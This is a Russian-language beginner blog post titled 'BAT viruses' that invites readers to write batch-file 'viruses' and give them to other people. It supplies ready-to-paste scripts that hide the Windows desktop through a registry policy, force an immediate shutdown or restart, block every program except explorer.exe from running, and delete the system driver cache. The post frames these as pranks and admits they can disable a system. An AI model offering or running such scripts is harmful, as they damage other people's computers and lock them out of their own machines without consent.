Новичку полезно



BAT вирусы

Теги: bat, вирус, windows

Многие наверное из начинающих пользователей слышали такие термины как хакер, вирус, взлом и т.д.Так вот давайте с вами сегодня просто поприкалываемся с одним из этих терминов и попытаемся разобраться что к чему! Итак – Вирусы! Что же это такое?

По сути своей вирус – это программка, обычная написанная программка, которая выполняет тоже свои функции. Существует великое множество вирусов,все и не сосчитаешь,и с каждым днем они становятся все интереснее и полезнее со стороны хакеров,и все сложнее и опаснее если смотреть со стороны пользователя или вирусологов =) Ну не будем сильно пока вдаваться в подробности,так как вам уже наверное хочется побыстрее написать свой вирус и кому-нибудь его подарить =)

Легче всего можно написать вирус в ОС Windows с помощью обычного текстового редактора примененного на текстовом документе,впоследствии которому изменим расширение на *.bat.Такие файлы называют батниками,это можно сказать такие “ключики” к замочкам в системе. Но не стоит забывать что можно и нарушить работу системы а то и вообще вывести из строя! Ну что ж пожалуй начнем.

Для начала откроем наш текстовый документ.

Что бы вам не мучаться вопросами что и как я просто приготовил для вас несколько текстов с кодами,просто скопируйте их туда и сохраните с расширением *.bat

Убирает рабочий стол

@echo off 
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul

Выключает компьютер

@echo off 
shutdown -s -t 1 -c "lol" >nul

Рестарт компа

@echo off 
shutdown -r -t 1 -c "lol" >nul

Не дает запустится прогам

@echo off 
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul

Удаляем дрова

@echo off 
del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul

Продолжение смотрите в следующей статье...

Добавить комментарий


Обновить